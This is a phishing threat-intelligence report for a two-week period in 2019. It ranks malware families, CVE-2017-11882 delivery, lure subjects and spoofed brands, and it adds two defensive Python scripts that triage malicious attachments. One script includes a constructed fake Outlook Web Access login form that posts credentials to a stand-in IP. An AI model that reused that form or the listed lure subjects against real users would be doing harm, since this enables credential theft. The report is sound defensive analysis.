C2 SOURCES FOR REPORT PERIOD - Cofense · EXECUTIVE SUMMARY: In a hurry...


Page 1: C2 SOURCES FOR REPORT PERIOD - Cofense · EXECUTIVE SUMMARY: In a hurry? Understand the phishing threat landscape at a glance. Here you can find the top threats of the reporting period to directly support your executive leadership.

C2 SOURCES FOR REPORT PERIOD
2019-07-18 TO 2019-08-01

U.S. Public Schools Web Services Targeted By Credential Phishing Campaigns

Cofense Intelligence has analyzed a credential phishing campaign that is targeting the webmail services of specific K-12 public schools. The latest attack specifically targeted Outlook Web Access (OWA) credentials by posing as a copy of an OWA login page. The emails sent to harvest credentials included a .HTM file that spoofed the webmail service with the fake login page. Unsuspecting victims would believe the message is legitimate thanks to its subject, 'Message From The Administrator', and its theme of an email account closure notice, leading to a higher rate of success.
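The campaign above delivers the fake login page as an .HTM attachment rather than a link, so the whole lure, including the form that collects the credentials, is present in the attachment and can be triaged before anyone opens it. The following is an added example (not Cofense code and not derived from the campaign's actual files) of such a triage check: it parses the attachment, finds any form that carries a password field, reports which host that form posts to, and looks for the lure phrases the report names. The trusted webmail host owa.example-school.edu and the sample attachment are constructed for the demonstration; 203.0.113.10 is a documentation address standing in for the collection server.

```python
"""Triage an .htm e-mail attachment that may be a spoofed webmail login page.

Added example; not Cofense code. Assumptions: the organisation's legitimate
webmail host is owa.example-school.edu (hypothetical) and the sample HTM
below is constructed for the demonstration, not a real phishing file.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_LOGIN_HOSTS = {"owa.example-school.edu"}   # assumption: the real OWA host

# Lure phrases from the campaign described in the report (matched case-insensitively).
LURE_PHRASES = ("message from the administrator", "closure")


class FormCollector(HTMLParser):
    """Collect every <form> with its action URL and input types, plus all page text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.text = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", "").strip(), "inputs": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append(a.get("type", "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

    def handle_data(self, data):
        self.text.append(data)


def analyse_htm_attachment(html_text, trusted_hosts=TRUSTED_LOGIN_HOSTS):
    """Return a verdict and findings for a standalone HTM attachment.

    A legitimate webmail login page is never delivered as an attachment, so any
    password form is itself a finding; its action URL is the collection endpoint.
    """
    parser = FormCollector()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        if "password" not in form["inputs"]:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        if not host:
            findings.append("password form with relative/empty action (likely JavaScript submission)")
        elif host in trusted_hosts:
            findings.append(f"password form posting to trusted host {host} from an attachment")
        else:
            findings.append(f"password form exfiltrates to {host}")
    body = " ".join(parser.text).lower()
    for phrase in LURE_PHRASES:
        if phrase in body:
            findings.append(f"lure phrase: '{phrase}'")
    return {"verdict": "suspicious" if findings else "clean", "findings": findings}


# Constructed sample attachment modelled on the report's description.
SAMPLE_HTM = """<html><head><title>Outlook Web App</title></head>
<body>
<h2>Message From The Administrator</h2>
<p>Your mailbox is scheduled for closure. Sign in below to keep your account active.</p>
<form method="POST" action="http://203.0.113.10/owa/auth.php">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
</body></html>"""

if __name__ == "__main__":
    result = analyse_htm_attachment(SAMPLE_HTM)
    print(result["verdict"])
    for finding in result["findings"]:
        print(" -", finding)
```

The host the password form posts to is the indicator worth extracting into a block list; the lure-phrase match is only corroboration. A page that submits credentials with script instead of a form action shows up here as the "relative/empty action" finding and needs the script itself inspected.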

TABLE OF CONTENTS

IN A HURRY

PHISHING TRENDS
  Top 5 Families by Volume
  Top 5 Phenotypes
  Top 5 Delivery Mechanisms

FILE AND DELIVERY TRENDS
  Top 5 Subjects
  Top 5 Spoofed Brands
  File Extensions

INTELLIGENCE METRICS
  New PhishMe Templates
  Cofense Triage Rules
  IOC Count by Severity

C2 DISTRIBUTION
[Chart: C2 distribution for the report period, bar axis 5 to 100; the per-source values did not survive extraction]

Page 2

EXECUTIVE SUMMARY

In a hurry? Understand the phishing threat landscape at a glance! Here you can find the top threats of the reporting period to directly support your executive leadership. While the information on this page is also found elsewhere in the report, we wanted to provide a one-page summary that you can include in your internal executive reports.

TOP MALWARE THREATS
  Family:     Agent Tesla
  Phenotype:  Keylogger
  Stage One:  CVE-2017-11882

TOP CAMPAIGN FEATURES
  Subject:         Order PCT1086586 - Instruments - ENQUIRY
  Abused Brand:    DHL
  File Extension:  .doc
  Phishing Source: United States

INTELLIGENCE METRICS
  Threat Reports: 471
  IOCs:           2457
  YARA Rules:     46

Page 3

PHISHING TRENDS

Agent Tesla Takes The Lead For Most Popular Malware

For the first time, the Agent Tesla malware family has overtaken Loki Bot in popularity among the campaigns analyzed. Correspondingly, keyloggers have risen to become the most popular phenotype, overtaking information stealers. CVE-2017-11882 is once again at the forefront of delivery mechanisms. For more information on CVE-2017-11882, see https://cofense.com/patch-pass-cve-2017-11882-security-conundrum/.

FAMILIES (Report Period)
1. Agent Tesla
2. Loki Bot
3. NanoCore
4. Credential Phishing
5. Remcos Remote Access Trojan

FAMILIES (Year)
1. Loki Bot
2. Pony
3. NanoCore
4. Hawkeye Keylogger
5. AZORult

[Chart: Campaigns Over Time, per family; the plotted values did not survive extraction]

PHENOTYPES OVER TIME

Phenotypes organise malware families by behavior and intent.

Legend: Report Period | Previous 12 Months (Avg)
Phenotypes charted: keylogger, stealer, bot, rat, other_malware

[Chart: Campaigns Over Time, per phenotype; the plotted values did not survive extraction]

DELIVERY MECHANISMS OVER TIME

Malicious files used to begin an infection sequence.

Legend: Report Period | Previous 12 Months (Avg)
Mechanisms charted:
- CVE-2017-11882
- OfficeMacro
- WSCDownloader
- CVE-2017-8570
- Office Document with Malicious OLE Package
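CVE-2017-11882 leads both the delivery-mechanism ranking here and the "Stage One" entry on the executive summary page. It is a memory corruption bug in the legacy Equation Editor (EQNEDT32.EXE), so a document that exploits it has to embed an Equation Editor object, and that object is what a mail gateway or triage script can look for. The following added example (not Cofense code, and not a detector for the exploit itself) scans a Word or RTF attachment for the three indicators an embedded Equation Editor object leaves behind: the ProgID Equation.3, the on-disk form of its CLSID {0002CE02-0000-0000-C000-000000000046}, and the "Equation Native" stream name. For RTF it first decodes the hex-encoded \objdata blocks, since the ProgID lives inside the OLE1 header in that blob rather than in plain text. The sample RTF is constructed and truncated after the class name; a real object would continue with the object size and the compound-file payload. Presence of an Equation object is a triage heuristic, not proof of CVE-2017-11882 exploitation, and a sample that hides the object under a different container (or reaches Equation Editor through CVE-2017-8570 style packaging) will not be caught by it.

```python
"""Look for an embedded Equation Editor object in a Word/RTF attachment.

Added example; not Cofense code and not an exploit detector. It flags the
indicators an Equation.3 object leaves in a document so the file can be
prioritised for sandboxing. Sample input is constructed and truncated.
"""
import re

EQUATION_PROGID = b"Equation.3"
# CLSID {0002CE02-0000-0000-C000-000000000046} as stored in a compound file:
# Data1/Data2/Data3 little-endian, Data4 as written.
EQUATION_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
EQUATION_NATIVE_ASCII = b"Equation Native"
EQUATION_NATIVE_UTF16 = "Equation Native".encode("utf-16-le")  # directory entry name form


def decode_rtf_objdata(data):
    """Return the binary payload of every \\objdata hex block in an RTF file."""
    blobs = []
    for m in re.finditer(rb"\\objdata\s*([0-9a-fA-F\s]+)", data):
        hexdigits = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdigits) % 2:          # tolerate a truncated trailing nibble
            hexdigits = hexdigits[:-1]
        blobs.append(bytes.fromhex(hexdigits.decode("ascii")))
    return blobs


def scan_for_equation_object(data):
    """Report where Equation Editor indicators appear: raw bytes or decoded RTF objects."""
    views = [("raw", data)]
    views += [(f"rtf_objdata[{i}]", blob) for i, blob in enumerate(decode_rtf_objdata(data))]
    hits = []
    for label, blob in views:
        if EQUATION_PROGID in blob:
            hits.append(f"{label}: ProgID Equation.3")
        if EQUATION_CLSID in blob:
            hits.append(f"{label}: CLSID 0002CE02-0000-0000-C000-000000000046")
        if EQUATION_NATIVE_ASCII in blob or EQUATION_NATIVE_UTF16 in blob:
            hits.append(f"{label}: 'Equation Native' stream name")
    return hits


# Constructed sample: an RTF whose \objdata carries an OLE1 header naming
# Equation.3 but deliberately omits the \objclass control word, so the ProgID
# is only visible after hex-decoding. Truncated after the class name.
OBJDATA_HEX = (b"\x01\x05\x00\x00"       # OLE1 version
               b"\x02\x00\x00\x00"       # format id: embedded object
               b"\x0b\x00\x00\x00"       # class-name length, NUL included
               b"Equation.3\x00").hex()
SAMPLE_RTF = b"{\\rtf1\\ansi {\\object\\objemb{\\*\\objdata " + OBJDATA_HEX.encode() + b"}}}"

if __name__ == "__main__":
    for hit in scan_for_equation_object(SAMPLE_RTF):
        print(hit)
```

Run against the sample this reports a single hit in rtf_objdata[0]; the raw view is silent because the ProgID is hex-encoded. In the binary .doc case the same function catches the CLSID or the UTF-16 stream name directly in the file bytes. Anything the scan flags should still go to a sandbox: the decision that matters is whether EQNEDT32.EXE spawns a child process or makes a network connection, which a byte scan cannot tell.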

Page 4

FILE AND DELIVERY TRENDS

Orders And Shipping Related Themes Rank Highest

Phishing campaigns with subject lines centered on order invoices and shipping notifications ranked highest among the themes analyzed. DHL is the top spoofed brand seen, and .zip attachments increased markedly during this data range.

SUBJECTS

Order PCT1086586 - Instruments - ENQUIRY

TNT Express Invoice: 09004105

NEW ORDER

REQUEST FOR QUOTATION_HGTC

//Interested in your product//

BRANDS SPOOFED
  DHL     50%
  TNT     24%
  HSBC    13%
  FedEx    7%
  Maersk   7%

FILE EXTENSIONS DELIVERED DURING REPORT PERIOD

Extensions of files delivered either directly via email or via an embedded URL.

Legend: Report Period | Previous 12 Months (Avg)
Extensions charted: xlsx, docx, r02, img, zip

[Chart: Occurrences Over Time, axis 0 to 300; the per-extension counts did not survive extraction]

Page 5

COFENSE INTELLIGENCE METRICS

We Need Your Feedback! Cofense Intelligence consistently provides our PhishMe team with real phishing messages to use in the creation of PhishMe templates. We also offer daily YARA rules directly to our Triage users to help them better identify specific campaigns that target their users. Here you can find the most recent PhishMe templates and YARA rules that we have highlighted.

NEW COFENSE PHISHME TEMPLATES

SUBJECT DATE

Sharepoint Alert 2019-07-26 18:14:06 UTC

Bonus Document 2019-07-26 18:11:31 UTC

Independence Day eCard 2019-07-26 18:09:25 UTC

New Project Team 2019-07-26 18:08:01 UTC

Clipped Message 2019-07-26 18:06:09 UTC

NEW COFENSE TRIAGE YARA RULES

PM_Intel_NetWire_27021

PM_Intel_Loki_27019

PM_Intel_CredPhish_27009

PM_Intel_CredPhish_26967

PM_Intel_CredPhish_26946

IOCS BY SEVERITY

SEVERITY COUNT

MAJOR 1698

MODERATE 369

MINOR 386

NONE 4

OTHER 0